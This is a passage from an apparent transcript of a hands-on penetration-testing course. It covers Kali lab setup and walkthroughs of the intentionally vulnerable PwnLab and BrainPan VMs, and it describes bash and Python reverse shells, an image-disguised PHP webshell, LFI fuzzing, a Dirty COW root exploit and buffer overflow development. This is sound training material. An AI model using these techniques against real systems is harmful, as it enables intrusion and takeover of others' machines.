Welcome to my Hands-On Penetration Testing Labs 2.0 course. You can think of this as part 2 of my other course, which has a similar name. This lecture is going to provide an overview of what you can expect for the remainder of this course. First of all, I would like to express that this course is extremely hands-on. This means that we're not going to be doing much talking about the theory of penetration testing. We're going to be diving into the hands-on technical application right away. For this, we're going to be using VirtualBox as a software hypervisor to build a host-only lab environment. Not only will this help you gain insight into penetration testing, but it will give you the skills and resources to create your own environment to test and research beyond what you learn in this course. The lab is going to consist of Kali Linux and a variety of intentionally vulnerable Linux and Windows VMs. Some of the things we'll be covering are enumeration and vulnerability scanning and local and remote exploitation with industry-standard penetration testing tools such as Nmap, Derby, Nikto, Metasploit, and standalone exploits. We're also going to focus on exploit development, covering in detail how to craft a buffer overflow exploit for a custom Linux and Windows binary. In order to accomplish this goal of buffer overflow exploit development and debugging, we're going to be creating a Windows 7 analysis and attack machine. This will have industry-standard tools for exploit dev, such as Immunity Debugger. We're also going to learn how to use Kali Linux's built-in GNU debugger for this purpose. The technology and methodology used in this course is current at the time of this recording, which is January 2019. If you're watching this after the stated date, don't be worried too much, as this content should still be highly relevant for aspiring penetration testers. I will also be introducing you to several free training platforms which I found to be extremely helpful prior to earning my many hands-on penetration testing certs, including OSCP and EWPT. This training has also helped skyrocket my progress as a skilled senior penetration tester and subject matter expert. I truly hope that you enjoy my course, and I'm very excited to be working with all of you. If you have any trouble, please don't hesitate to reach out to me via the Q&A system or direct messaging. However, please make sure that you include a detailed and specific question, not something like, "I can't get this to work." Also, I'd like to say that I highly encourage independent research and attempting to find out answers on your own. This is the single most important skill as a penetration tester, the ability to find solutions to problems you haven't yet encountered. I ask you to please go through the majority of this course prior to leaving a review so that you can accurately measure this course's quality in entirety. I always appreciate constructive feedback and encourage students to reach out to me directly if they think anything valuable could be added to the coursework. Thank you very much and have fun. Due to the popular demand in my previous pen testing courses, I'm going to provide a technical explanation of many but not all of the commands and tools that we'll be utilizing within this course. Also, in the resources attached to this lecture, I have a bunch of URLs that contain additional comprehensive information related to what we're about to cover. If there's anything that you're confused about or need further information on that you cannot find out on your own research, please feel free to contact me via the Q&A system or direct messaging. If you're already well-versed in basic to intermediate Linux commands, you should be okay with skipping this lecture. Otherwise, stay tuned for the new information or for this refresher, depending on your skill level. Let's start out with reverse shells. So, what are reverse shells? Well, in our case, they're a remote shell that's initiated from the target or destination to the attacker machine or the source. For example, Kali Linux is the attacker machine. A vulnerable VM such as PwnLab is the target. A reverse shell will function by forcing PwnLab, the target or destination, to initiate a connection back to Kali Linux, the source. The concept of reverse shells may be confusing at first. but let's go over this quick demonstration to hopefully provide some clarity. This command uses bash to create a network connection with the IP address 192.168.56.102 over port 8080. In order for this to work, the host 192.168.56.102 must have some sort of listener like Netcat or Metasploit's multi-handler actively listening on port 8080. Now let's break down what this command is actually doing. So bash-i creates an interactive instance of bash. First of all, you need to understand that there are 3 default files in bash. stdin, which is standard input, such as from the keyboard. stdout, which is standard output, such as from the terminal. And stderr, which is standard error, which is where the errors are output. The file descriptors for standard input, standard output, and standard error are 0, 1, and 2 respectively. This symbol here, the greater than ampersand, causes it to send standard output and standard error through the connection /dev/TCP, the IP address and the port. Now the 0 greater than ampersand 1 sets standard input to be read through the connection. Now let's see what happens when I execute this bash command. As you can see here, we've acquired a reverse shell to Netcat. This next reverse shell command is a simple one-liner that uses Python code to import the socket library and initiate a network socket to the IP address and port specified within sconnect. As you see right here, IP address of Kali Linux and port 4444. In this scenario, the listening server must be set up on the attack machine. This will be some type of listener such as Netcat or Metasploit's multi-handler. Please note that for this reverse shell to work properly, we need Python to be installed on the target machine. This is more likely to be present on a Linux machine rather than Windows. Now let's try executing the Python reverse shell command. As you can see, Python isn't installed on this machine, therefore it will not work. However, you're going to see this command being used to establish reverse shells multiple times throughout this course. Let's move on to spawning TTY shells. A fully interactive terminal is a TTY shell. In Unix terminology, a TTY is a type of device file that implements additional commands other than read and write. In its earlier days, it was referred to as teletypewriter, or TTY for short. Basically what it is a terminal. Sometimes we get limited access via exploits, resulting in shells with limited functionality, such as what you're looking at right now on the screen. This is not as favorable as a TTY shell. Sometimes, once we get limited access shells, we can run code such as Bash, Python, or Perl to gain a fully interactive, or TTY shell. Let's take a look at this simple command here. This is a Python one-liner to import the pty library, which handles sudo terminal utilities and attempts to spawn a bin sh shell. Assuming this machine has Python installed on it, it should work. As you can see, it spawned a TTY shell that should be fully interactive. Let's move on to another command, this time using bash. This command here spawns a bin sh shell by trying to run the command interactively with the -i switch. Okay, as you can see, the tty shell has been spawned. Now let's briefly cover some of the primary tools that we'll be utilizing throughout this course. As you progress, you'll be seeing me using all of these industry standard pen testing tools in order to enumerate and exploit several vulnerable VMs. NetDiscover is a network address discovery tool, as its name implies. It's only good on local area networks, as it's based on Address Resolution Protocol, or ARP, to send ARP requests and sniff for replies. Since our lab environment will be within a host-only LAN, we can use this to scan for targets. Network Mapper, or simply Nmap, is an open source tool for vulnerability scanning and network discovery. Nmap is one of the most well-known tools in the cybersecurity community, particularly for penetration testers. We'll be using this throughout the course to enumerate services and scan common ports. Nikto is an open source web server scanner that performs vulnerability scanning against web servers. For comprehensive information on Nikto, check their official documentation. Derby is a web content scanner. It looks for existing and/or hidden web objects. This can be accomplished by running a dictionary-based brute force attack, analyzing the web server's response to enumerate web directories. This tool is important when trying to find vulnerabilities such as broken access control within web applications. Metasploit is one of the most well-known tools within the cybersecurity field, especially for penetration testers. Metasploit is a penetration testing platform that has the ability to find, exploit, and validate vulnerabilities. It also has great capabilities such as standing up a multi-handler listener to get reliable reverse shells. Burp Suite is another well-known tool within the cybersecurity and pen testing field. Burp Suite is best utilized for penetration testing against web applications. The Pro version is obviously way better because it includes the scanner and multiple other features that are useful. However, for this course, we'll be using the free version. As we move forward in the course, I'll be showing you how to set up the proxy and utilize some of its best features for a pen test.
Due to the recent changes in Kali Linux 2020, I'll be providing a custom-built VM for all of my courses, although this VM was built specifically for my newest course, Hands-On Penetration Testing Labs 4.0. This can be downloaded from the Google Drive that's attached to this lecture as a text file, as you see on screen. Kali Linux 2020 has one primary difference from all of its predecessors, being that it does not come configured with the root user. Instead, they've implemented an unprivileged user named Kali, which requires the usage of sudo to elevate privileges for many commands. You can use the unprivileged Kali account if you want to, but I've configured a Kali Linux 2020 VM which is tailored for this course that has a root user created the same way as the previous version of Kali. Additionally, I've installed most of the tools that will be required for enumeration and exploitation during the course of the upcoming lectures for your convenience. In order to get it, open up a web browser as you see on screen, access my provided Google Drive, and download the Kali Linux OVA file. Do this, just click download. Click download anyway. After the download is complete, double-click the OVA file, which I'm going to show you in a moment. Okay, here's the OVA file. I'm just going to double-click that. It is going to open up VirtualBox Manager. Once that's open, just name this Kali Linux 2020, and I'm going to click Import. Just give that a bit. Once the import is complete, let's check our network settings. So right-click Kali Linux 2020, go to Settings, click the Network tab, And for adapter 1, we want it attached to NAT. We could alternatively have it attached to the bridged adapter. Either one is going to give us internet connectivity. For adapter 2, we want it set to host only, and make sure that you have a name selected. If you don't have one, then you'll have to create one. So the host only adapter is the one that is going to allow us to communicate with all of the vulnerable VMs which we'll be attacking during this course. To start it up, just highlight this and click Start. The two accounts I have for you here are username root and password Tor, or TOOR, all lowercase, and username Kali and password Kali, KALI, also all lowercase. So there you go, you're all set up. Enjoy.
This video will show you how to download and configure Kali Linux within VirtualBox using the most recent version as of January 2019. Kali Linux is an industry standard for pen testers and will be the operating system used to exploit numerous intentionally vulnerable VMs during this course. Associated URLs and commands for this lab will be included in a text file. As the technology we're using evolves, the version of Kali Linux and some of the commands shown may be slightly different. However, I frequently update my courses as needed when there are big technological changes that have considerable impact on its usability. As with anything related to my course, please reach out to me via the messaging or Q&A system if you have any trouble. However, to receive the maximum benefit from my course, I suggest you attempt troubleshooting on your own by using the many resources contained within the web and the most powerful resource of all, your brain. As a pen tester, Google will be your best friend. Learn how to use it and how to troubleshoot errors and find information about exploits and vulnerabilities. The first step is to download and install VirtualBox from virtualbox.org, which we won't be covering in the course because that's very simple. Once you have VirtualBox installed, we'll need to download the most recent version of Kali Linux for VirtualBox from Offensive Security's download page. Once again, these links are supplied in a text file with the lecture. Otherwise, you could just Google Kali Linux download. We're going to be using the Kali Linux VirtualBox image, which is located here, the 64-bit OVA file. Click that link to download. Now go to the folder location where you downloaded the OVA file and double-click it. This will open it with VirtualBox Manager. Once again, if you don't have VirtualBox, you'll need to download and install it from virtualbox.org. When prompted, click Import. First, let's make sure that we have a host-only network set up. Host-only is a form of networking that is completely isolated within the host computer, having no internet connectivity. We need this so that our VMs can communicate with one another. To check this, click File, click Host Network Manager. Now make sure that we have a VirtualBox host-only Ethernet adapter here. If you don't have one, we can create it. To do that, click Create. Click Configure Adapter Automatically. Check the Enable DHCP Server box. Now you're good to go with the host-only interface. Click Close. Now let's change a few of the virtual machine settings. Right-click Kali Linux, click Settings, I'm going to rename my virtual machine. You don't have to. Go to System. I'm going to raise my RAM to about 32 gigs. If you don't have that much, just raise it to about half of the RAM that you have. Also, for a pointing device, you're going to want to change that to PS2 mouse. Otherwise, it won't boot with the configuration that we're using. Click Processor. I'm going to raise mine to 4. Go to the Network tab. Click Adapter 2. Check Enable Network Adapter. Change it to Host Only Adapter. Now make sure that you have a Host Only Ethernet adapter name selected. This may have been created earlier or already exists. Next, go to USB. Uncheck Enable USB Controller, otherwise the VM won't boot properly. Click OK. Now with Kali Linux highlighted, let's click Start. The username and password by default is root, lowercase r-o-o-t, and lowercase t-o-o-r. Now open up a terminal. You can do this by clicking the terminal icon on the left-hand side. Now I'm going to change the preferences. I suggest you make them how you like it. To do this, click Edit, Preferences, click to add a new profile. I'm going to name mine Jesse. Click Create. I'm going to change the custom font, raise it to 17. This will make it easier for the students to view it. Now I'm going to go to Colors, change the transparency of the background because I don't like it that way. Now set my new profile as the default. So this is how I like it, but you configure this how you want to. It's all up to you. Now let's go over ifconfig, which shows the network interfaces. This is a very important command to troubleshoot your network connectivity. If you followed my guide, ETH0 is the NATed interface with internet connectivity, and ETH1 is the host-only interface, which will be used to communicate only with other host-only VMs. Type in ifconfig. Now immediately I realize that there is no IP address assigned to ETH1. If ETH0 or ETH1 does not have an IP address assigned, you'll need to fix that. To do this, we can run the following command. Type in service, smbd restart, and DH client, and the interface that does not have the IP address assigned. In my case, it is ETH1. Afterwards, let's run ifconfig again to make sure that we have an IP address assigned by DHCP. As you can see here, now we have an IP address for ETH1. Now let's make sure that we can ping a public-facing IP address to test internet connectivity. To do this, type ping 8.8.8.8. This is going to send a ping request to Google's DNS. All right. The ping works, so that means we have internet connectivity. At this point, it's a best practice to take a snapshot. This will save this point in time of your VM, and you can restore it if anything goes wrong. To do that, click Machine, Take Snapshot. I'm going to name it Fresh Install and click OK. Now let's run an update and upgrade command to make sure that all the packages and such are up to date. To do this, type in apt-get update and apt-get-y upgrade. This is going to select the default configuration for everything. If prompted at any time, just select the default by pressing Enter. Once the update and upgrade commands have completed, we are done with the Kali Linux setup and can move on to our next labs. This lab will show you how to download, configure, and set up a Windows 7 VM and the various tools we'll be needing to perform analysis on binaries during this course. We're going to need Immunity Debugger and Mona.py for efficient and effective analysis of applications and Windows-based exploit development. All of the things we need are free, and I'll show you where and how to get them. First, let's get Windows 7 from the developer.microsoft.com location and download the IE11 on Windows 7 virtual machine for VirtualBox. With these options selected, click Download Zip. Go to your download location, right-click the zipped file, unzipped. I'm going to extract it to the same folder. Now double-click the OVA file to open it with VirtualBox Manager. When prompted, click Import. Now let's change the virtual machine's settings. Right-click Windows 7, click Settings. I'm going to rename mine to Windows 7 Analysis Machine. Go to System. If you have RAM to spare, feel free to bump it up. I'm going to raise mine to around 16 gigs. Click Enable I/O API-C. This is going to allow the ability to support multiple processors. Click Processor. I'm going to raise mine up to 4 for higher performance. Now click Display. I'm going to raise my video memory to 37 megabytes. It requires a minimum of 27 to support full screen. Now click Remote Display. Uncheck Enable Server, otherwise you're going to get an error when you try to boot up. Click OK. Right-click the Windows 7 Analysis Machine. Click Normal Start. Now we'll want to enable Shared Clipboard so that we can copy and paste to and from the host and the VM. Click Devices, Shared Clipboard, Bidirectional. Now we're going to restart the VM. We're prompted to do so on first boot up. Now we'll want to create a snapshot so that we can revert to this point in time if anything goes wrong with our VM or if it expires. To do this, click Machine, take Snapshot. I'm going to name it Fresh Install and click OK. Now let's grab Immunity Debugger and Mona.py. These tools are going to be utilized to assist with debugging Windows binaries during custom exploit development, which is going to be highly useful during this course and as an exploit developer. Click Start, All Programs, Internet Explorer. I'm going to paste the URL to download Immunity Debugger. These URLs are listed in a text document attached to this lecture. Click Download Immunity Debugger here. You can put whatever you want in here, it doesn't matter. Click Download. Click Save As. Save. Go to your downloads location. Click Run. Click Yes to download Python as well, as you'll need this. Click I accept. Click Next. Click Install. Click Close. OK to begin Python installation. Just keep clicking Next for the defaults. Now let's get mona.py. This is a handy Python script that's useful for binary analysis. Here's the GitHub page. This is also included in the text file attached to this lecture. Click Clone or Download. Click Download Zip. Save. Open folder. Right-click. Extract all. Click Extract. Now we need to copy the Python script into the appropriate folder for usage in Immunity Debugger. It's the Python script here. Copy the Python script. Now let's go to the C drive, Program Files, Immunity Inc., Immunity Debugger, py commands, and just paste the Python script in this folder. Now you should have mona.py in this folder here. Now let's download PuTTY so that we can conveniently move files to and from Kali Linux and Windows. PuTTY is a client that supports FTP and SSH. Here's the URL to download it. Let's get the 32-bit version. Click Run. Click Next. Next. Install. Click Finish. Now let's shut down this VM and change the network to host only so that it can communicate with Kali Linux. Click the Close button at the top right. Power off the machine. Right-click Windows 7. Click Settings. Click Network. Change NAT to Host Only Adapter. Make sure it's the same name as the one that you have configured on Kali Linux. Click OK. Now we're going to download several intentionally vulnerable VMs from my Google Drive, which I've set up to allow you to conveniently download from a single location. Alternatively, you can search for them on Google as they're publicly available on VulnHub. There will be more setups required later on for specific VMs that require manual installation and configuration, but these are what we can use to start. If you don't have enough storage for all of the VMs, you can delete them as necessary during your progression through this course. The URL for this Google Drive will be provided to you in a text file which is attached to this lecture. Once you're at this Google Drive page, click Download All. We'll be going over whatever setup is necessary in each individual lab. This lab will consist of the enumeration and exploitation of PwnLab, which is an intentionally vulnerable Linux VM. The objective is to acquire root privileges on the box. You should have the PwnLab_init file downloaded at this point. If not, please go back to the previous lab which covers how to acquire the vulnhub VMs. Double-click on the PwnLab_init OVA file. This should cause it to open with VirtualBox Manager. When prompted, rename it to PwnLab and click Import. Now let's change PwnLab settings. Right-click PwnLab, click Settings. Go to the Network tab. Change from Bridged to Host-Only Adapter. Make sure it's the same name as the one that's configured for Kali Linux. Click OK. Start this VM. Now start up and log into Kali Linux. This should already be installed if you've been following the lectures from the beginning. First, let's open a terminal. Now let's run ifconfig to make sure that we have an IP address configured on the host-only interface, which is ETH1. Looks good. Here it is. Now we'll be scanning our host-only interface IP range with netdiscover. To do this, type in netdiscover -i ETH1. In my case, the IP address with .102 as the last octet is PwnLab. The IP address with .1 on the last octet is the VirtualBox virtual NIC. And the IP address with .100 on the last octet is on my VMware's network. The only relevant IP in terms of targeting is .102. This will be different in your environment. If you don't know for sure which IP to hit, just scan them all with the following nmap command until you discover the PwnLab VM. Now let's move on to enumeration of services with nmap. To do this, type in nmap-a and the IP address of PwnLab, which was discovered earlier. What this command does is scan only the most common 1000 ports by default. The -a switch enables OS detection, version detection, script scanning, and traceroute. I won't be explaining these commands in detail going forward, so please take note of this. This command may take a while to run, so feel free to take a quick break while you wait. As you can see from the nmap scan results, we have port 80 open. This is an Apache web server running on a Debian Linux operating system. There's also port 111 and 3306. The most interesting to me is the web server and MySQL, but I'll prioritize the web server for now. Let's get started by visiting the website with Firefox. Type in the IP address of PwnLab. Okay, the web page says use this server to upload and share image files inside the intranet. So let's go to login first. We have a web login page here. So let's try admin, see if we can just easily brute force the password. Admin password, root. Okay, I don't want to spend too much time on that, so let's see what's on the upload page. You must be logged in. Okay, so we need to log in. We need to bypass login somehow. So let's try single quotes. See if it's SQL injection vulnerable. It is not, or at least appears that it isn't. So let's take a break from this and see if we can enumerate any other pages. Now let's run dir. This is going to attempt to enumerate pages and see if we can get unauthenticated access to potentially sensitive resources. All you have to do is type in dir http:// and the IP address of PwnLab. Okay, that finished very quickly. I see here a couple directories were found, but we already knew about these directories, so this new information is not useful. I'm going to clear out of that. Now I'm going to run Nikto, which is a vulnerability scanner, to see if there's any glaring web vulnerabilities. So Nikto-h, IP address of the PwnLab VM. Okay, the Nikto scan results say that config.php exists. Let's see if we can access it directly on Firefox. Okay, so all we get is a blank page. Now let's try leveraging .pwn. This is a directory traversal scanning tool. This will find out if there's any directory traversal vulnerabilities that we can exploit. To use it, type .pwn -m http:/h IP address of PwnLab -f config.php. Enter to start. After .pwn ran its course, I observed that no directory traversal vulnerability was found. Let's go ahead and downgrade the version of Java from 10 to 8 prior to launching Burp Suite to see if we can find any useful info from the web server. To do this, type in update-alternatives --config Java. Now let's select 2, which is the selection for Java 8. We're doing this because Burp Suite is more compatible with 8. Now let's launch Burp Suite. This is over here on the left-hand side. Temporary project, click Next. Use burp defaults, start burp. Now click User Options. Click Display. I'm going to change the user interface font size to 14 and the HTTP message display font size, I'm going to change that to 14 as well. You can change it to whatever you like. Restart burp. Same thing as before. Now let's open up Firefox. Click the top right to open menu. Click Preferences. Type in proxy into the search box. Click Settings for network proxy. Click Manual Proxy Configuration. Type in your loopback address, which is 127.0.0.1. Change the port to 8080, which is the port that is by default on Burp Suite. Remove any text from the No Proxy For configuration. Click OK. Now click the Proxy tab in Burp Suite. Notice that the intercepting proxy is on. That means any web request is going to be proxied through Burp Suite and is going to be intercepted here and either forwarded or dropped at your discretion. Let's leave the intercepting proxy on for now. Go back to Firefox. Type in the IP address for PwnLab. As you see, the request was intercepted to the root directory of PwnLab. Click Forward. Now I'm going to go ahead and click on Login. As you see here, we have a page parameter with a value of login. What we know so far is that there may be a config.php file accessible, so we'll try to fuzz the page parameter for local file inclusion vulnerabilities, or simply LFI. Let's send this request to the intruder to run an LFI attack. Right-click here, Send to Intruder, click the Intruder tab, go to Positions. We already have the correct insertion point, which is going to fuzz the page parameter, and right here is where all the payloads are going to be attempted. Go to the Payloads tab. So I have a small set of payloads that I'm going to paste here. This is available to you in the text document, which is attached to this lecture. So click Paste after you've copied it. It's a payload count of 29. Now click Start Attack. Click OK. After the attack has run its course, sort by length by clicking length. Click it again. Okay, we see some outliers at the top. Let's take a look. We're going to click the Response tab. Let's maximize it so we can see it better. Okay, so in the response from the web server, I see some data here. It looks like it is base 64. So let's just copy that. See if we can decode it. I'll minimize that for now. Go to the decoder. Decode as base 64. All right, so it looks like we have some sort of configuration file here. Let's take a closer look. I'm just going to copy that and put it into a Gedit document and make it easier to look at. All right, so let's just keep that for later. Let's take a look at the other ones. Back to the intruder results. we had upload and index. So we already just looked at the upload one. Let's take a look at index. Same thing, base 64. Copy that. Paste it into the decoder. All right, we have another PHP file. Just going to pop that back into the same file that I put the other one in. Looking back to our intruder attack results, I see that there's one more result to look at. Resource equals config. So click on that. Go to the response tab, and down to the response of the web server, we see that there is another base 64 encoded text string. So copy that, paste it into the decoder. All right, great. Looks like we have a set of credentials, root and a password. Let's copy that and put it into our text file. Let's do some quick analysis of this PHP code which we've acquired. The first part here shows some filtering that only allows file extensions for image files. This applies to the upload function of the web page. Scroll down a bit. Down here, I notice that it includes a lang cookie if the cookie is set in requests. This is potentially valuable information for an attack later. And obviously, we have these credentials. It looks as though it's a MySQL database username and password, and I recall MySQL being enumerated by Nmap. Let's try to connect to MySQL using the credentials we just found. With a terminal open, type in mysql-h, IP address of PwnLab, -u, root, -p. Now enter the password we found earlier. Good, we're in. Now let's do some quick database enumeration. Type in show databases, semicolon. So it looks like we have a users database. Let's check that out. Type in use users, semicolon. Show table, semicolon. Here's a table, which is users. Let's check that out. Select all, or asterisk, from users, semicolon. So here I see a set of usernames and a set of passwords, but these passwords look like they're encoded in base 64. So let's go ahead and grab all of those and decode them in Burp Suite. Here's the base 64 encoded password for Kent. The same thing as before, decode is base 64. And here we go. Here's the decoded password. This may be our way into the web server, so let's go ahead and try Kent and this password here. Make sure that the proxy is off. Go to Firefox and go to the IP address of PwnLab. Log in. Let's try the username of Kent and the password that we just decoded. Click log in. Good. Looks like we're logged in with a set of credentials of Kent and the decoded base 64 password. Here is some simple PHP code I created to execute shell commands on the web server via PHP. Notice that the file extension is .png and that there is GIF89 semicolon at the top. This is to bypass all filters we observed to only allow image files. Now let's upload the file to see if we can execute PHP code. Click Browse, cmd.png, upload. Alright, so I remember by observing the PHP files that the upload directory is where these files would end up. Here it is. Now let's see if we can execute code. I'm going to type index.php !cmd equals hostname. Alright, so as you can see, we are having no luck executing code straight up. Let's go ahead and load up Burp Suite and see if we can get around that. Let's go ahead and turn the intercepting proxy on. And let's intercept a request to index.php. Now let's go ahead and remove this session ID and replace it with lang. Now we're going to have to include the file path to the upload. So lang // upload / and now we're going to copy the file name of the PNG file. And now let's do a command injection by appending $cmd equals hostname. Let's right click and send that to the repeater. Click go. As you can see here, it returned the hostname in the response from the web server, indicating that we're able to execute commands at this point. Now let's try to get a reverse shell. First, let's open up a terminal and start a netcat listener by typing nc-nlvp 4444. Now we're going to inject a Python command to gain a reverse shell in the cmd parameter. Make sure to change the IP address to the IP that is your Kali Linux VM. What this command does is basically attempt to create a network socket to the target IP and port. Before clicking go, highlight the command, right-click, convert selection, URL encode all characters. Now click go. As you see, we've gained a reverse shell. We're going to have to spawn a TTY shell so that we can run commands. Since we already know that Python works, let's go that route. This Python command will spawn a bin sh/tty shell. Good. Now let's run su Kent to try to log in as Kent. As you can see here, we're running as the www-data user. Now let's enter the password. Good. Now we're logged in as Kent. Let's see if Kent has sudoer privileges. Okay, so we're not able to sudo su. Let's see if we can access the root directory. Permission denied. This means that we do not have root privileges, and that is the goal. So we're going to have to escalate our privileges to root somehow. Let's type in uname A. All right. So I've had a lot of success with Dirty Cow in the past for Linux boxes, and this has a Linux kernel that's potentially vulnerable. So I'm going to try that right off the bat. Let's go ahead and turn off the Burp Suite proxy. Go to Firefox. We're going to download the Dirty Cow exploit. Just going to copy this. Open another terminal. Go to cd /var/www/html. I'm going to copy this in my web root for Kali Linux. Just copied that into a file named cow32.c. Now let's start the Apache 2 service so we can host this file. Service Apache 2 start. Back to our reverse shell. Now let's change to the temp directory by typing cd/tmp. Now let's download the exploit with wget. So type in wget http:// IP address of Kali Linux /cow32.c. Now let's use gcc in order to compile the cow32.c file. So type in gcc cow32.c -o cowroot, that's the name of the file you're going to output it to, -pthread. Ignore the warnings. Now let's try running the executable. So /cowroot. Very good. It looks as though the privilege escalation exploit has worked properly, and we are now logged in as root. This exploit may cause some system instability, such as crashing, so run this echo command as shown. This was recommended by the writer of the exploit. This lab will cover the enumeration and exploitation of BrainPan, an intentionally vulnerable Linux VM. If you followed the previous lecture's instruction, you should already have downloaded BrainPan. Double-click the OVA file to open it in VirtualBox Manager. Click Import. Right-click BrainPan. Click Settings. Click Network. Change the network adapter attached to host-only adapter. Make sure the name is the same one as the one that is configured on Kali Linux. Click OK. With BrainPan highlighted, click Start. Once BrainPan has booted up, hop on Kali Linux and let's get started with enumeration. First, we need to find the IP address by scanning our host-only interface with netdiscover. To do that, type in netdiscover -i ETH1. In my case, the IP address is going to be the IP with .103 as the last octet. As we discovered in the previous lab, .1 and .100 are not viable targets. Now let's run an Nmap scan to enumerate services running on BrainPan. Nmap-A, IP address of BrainPan. The Nmap results show that we have two ports open, 9999 and 10,000. One is a simple HTTP server, which should be accessible via the web browser, so let's give that a shot first. Please note that in our previous lab, we configured the network proxy in Firefox to work with Burp Suite, so you'll have to change your settings back or have Burp Suite up in order to access the website. In order to change the proxy settings back, click the top right to open Menu, Preferences, type Proxy into the search bar, click Settings, go to No Proxy, click OK. Now let's try to access BrainPan. So http:// IP address of BrainPan, and the port number that we discovered was 10,000. Okay. So it looks like this is an image. This view page source. Okay. So all this is an image. We have no links and very little to go by. Let's go ahead and try to see if we can enumerate any directories. To attempt to enumerate web directories, we're going to use dirb. In order to do that, open a terminal as so, type in dirb, and the URL for BrainPan, http:// IP address of BrainPan, and the port number, which was 10,000. dirb has quickly discovered another directory, which is /bin. So let's go ahead and check that out on the web browser. Visiting the bin directory, we see a Windows executable, brainpan.exe. Perhaps this is the service that's running on port 9999 that we saw earlier on Nmap. With knowledge of how CTFs generally work, logic will tell you that we're going to have to find a way to exploit brainpan.exe over port 9999. But first we're going to have to analyze it locally on our Windows analysis box that we created in our previous setup lecture. Go ahead and boot up your Windows 7 analysis machine. Once it's booted up, go to Internet Explorer. Go ahead and visit the location on BrainPan for the bin folder. It will be at http:// IP address of BrainPan with the port of 10,000/bin. Download that file. Now let's run brainpan.exe in Immunity Debugger. We'll be using this tool to analyze it as we throw malicious payloads at brainpan.exe to test the results. Our goal is to create a working buffer overflow that will hopefully allow us to gain access to Windows 7. If this works, we'll be able to use a similar method in order to exploit BrainPan over the network. Double-click Immunity Debugger. Go to File, Open, go to your download location, and select brainpan.exe. Now click the play button. Allow access. Now we're going to jump on our Kali Linux VM. With Kali Linux up, let's do a quick Nmap scan against the Windows 7 box. First of all, let's find out the IP address of it. So netdiscover-i eth1. Alright, there we go, got the IP address. We could have run a ipconfig command on the Windows 7 box itself because we already have access to it, but this is just to show you how you do it if you did not already have access. Now let's run nmap against the Windows 7 VM. As you can see here, we have the same exact information over port 9999 for Windows 7 with this service running. Let's go ahead and start fuzzing the service. Here's some simple Python scripts I created that you can find on my GitHub page. Links will be made available in this lecture's resources. Let's take a quick look at brainfuzzer.py. Let's go ahead and open up brainfuzzer.py in a text editor. I'm going to be using V. So what this script does is send 100 A characters to the service, incrementing by 100 until it reaches 4,000 A characters or until brainpan.exe crashes. The purpose is to see the length at which brainpan.exe crashes. This is going to be useful information for us when we begin exploit development. Scroll down a little bit. As you see here, it accepts server and port arguments and passes those variables to sconnect, which is right down here. The string variable is the payload that is going to be incremented as explained before. That is going to be sent with send. Let's go ahead and begin testing. In order to run the script against the Windows 7 machine, do the following. Type in Python, brainfuzzer.py, the IP address of the Windows machine, and the port number, which is 9999. Alright, so the Python script stopped at 1000 bytes, meaning that 900 bytes is the value at which brainpan.exe crashed. Let's go over to Windows 7 and take a look at Immunity Debugger. As you can see, the EIP is filled with A characters, which are 41 in ASCII. Now we need to reliably control the EIP to continue to create a working exploit. For more in-depth explanations and full coverage of the basics of buffer overflow development, check out my YouTube video on SLMail buffer overflow development and exploitation. The link to it is in the resources for this lecture. Now back to Kali Linux. So with knowledge that we need 900 bytes to crash brainpan.exe, we'll use the Ruby scripts pattern create in conjunction with pattern offset in order to find correct values to place into our final exploit to reliably invoke our shellcode. First step, let's just locate pattern create. There it is. So I'll copy that, full path, -L for length, 900 because we need 900 bytes to crash brainpan.exe. Okay, so copy this pattern. Let's open brainpan1.py in a text editor. So what this does is very simple. All it does is send the pattern that we just generated to the Windows 7 VM over a specified port, which in our case is going to be 9999. The purpose of this is to analyze the string that overwrites the EIP so that we know the pattern offset in order to reliably control the EIP. Before we run this script, we're going to have to restart brainpan.exe in Immunity Debugger because this has already crashed. So let's just close out of this, restart Immunity Debugger, File, Open, select brainpan.exe again, click the play button, and we should be good to go. Back to Kali Linux. Now let's run the script against the Windows 7 VM. Python brainpan1.py, Windows 7 IP address, port 9999. Alright, back to the Windows 7 VM to analyze the results. Alright, good. So as you can see here, the EIP is overwritten with the pattern 357244134. Let's go ahead and select that, copy the selection to clipboard. Our next step is going to run that through pattern offset, so we're going to have to go back to Kali Linux. Back on Kali, let's go ahead and locate pattern offset and use that full path, -q for query. Now paste the value with which the EIP was overwritten from our previous test. Good. We have an exact match at 524. With this valuable information, we can try to reliably control the EIP. Now let's take a look at my next Python script, brainpan2.py. So here the buffer variable has a payload of 524 A characters, followed by 4 B characters, filling the rest with C characters and subtracting the previous values. The whole point of this is to see if we can reliably overwrite the EIP with the B characters, because we found that we have an offset of 524. So let's go ahead and run that against the Windows 7 VM and see what we get. First of all, we're going to have to reset Immunity Debugger. So let's go back to Windows 7. Go ahead and kill Immunity Debugger. Restart it. File, Open, brainpan.exe. Click the play button. We're good to go. Back to Kali Linux. Now let's run brainpan2.py against the Windows 7 machine, same as before, Python, brainpan2.py, IP address of the Windows 7 VM, and the port 9999. Back to Windows 7 for analysis. Okay, back over to Immunity Debugger, we see that the EIP was filled with 4 B characters, which is 42 in ASCII. At this point, we can say that it's working properly. Now we need to check for bad characters. What bad characters are characters that are not rendered properly by the application. So what we're going to do is send all characters to brainpan.exe and see if there are any that aren't being rendered properly. To do this, let's go back to Kali, but first let's restart Immunity Debugger so we can get that out the way. Let's check out my Python script brainpan3.py. All this does is send all characters to brainpan.exe over port 9999 as specified. Let's go ahead and run it and see what we get. Run the script, same as the others. So Python brainpan3.py, IP address of the Windows box, port 9999. Now let's go back to the Windows 7 VM for analysis of characters rendered to see if there are any bad characters. Okay, to check for bad characters, what you're going to need to do is look at the bottom right here and read from right to left and just check to see if all of the characters in the list that were sent are present. So you have 01, 02, 03, 04, and so on. And you just have to go down the line and see if all of the characters are there. FF is the last one. I've already taken my time to make sure that all the characters are here, but that's how you analyze the results and see if all of the characters are present and check for bad characters. Now, 00 is always considered a bad character, so that is always going to be excluded from your shellcode. Now we need to find the JMP ESP address in order to overwrite the EIP with it to execute shellcode. Let's go back to Kali Linux to quickly look up the JMP ESP value using the Ruby script nasm shell. Back to Kali, let's go ahead and locate nasm_shell. Just go ahead and put that in, press enter. Type in JMP ESP. There it is. We have FFE4. I'm going to use that information and go ahead and go back to Windows 7 and use mona.py in order to find the JMP ESP address for brainpan.exe. Alright, on Windows 7, just go down to the bottom here. Type in !mona find -s /xff /xe4 -m brainpan.exe. What this is going to do is locate the JMP ESP address for brainpan.exe that we are going to use to overwrite the EIP and execute our shellcode. Okay, here's the address we want to use. Let's go ahead and right-click that, copy 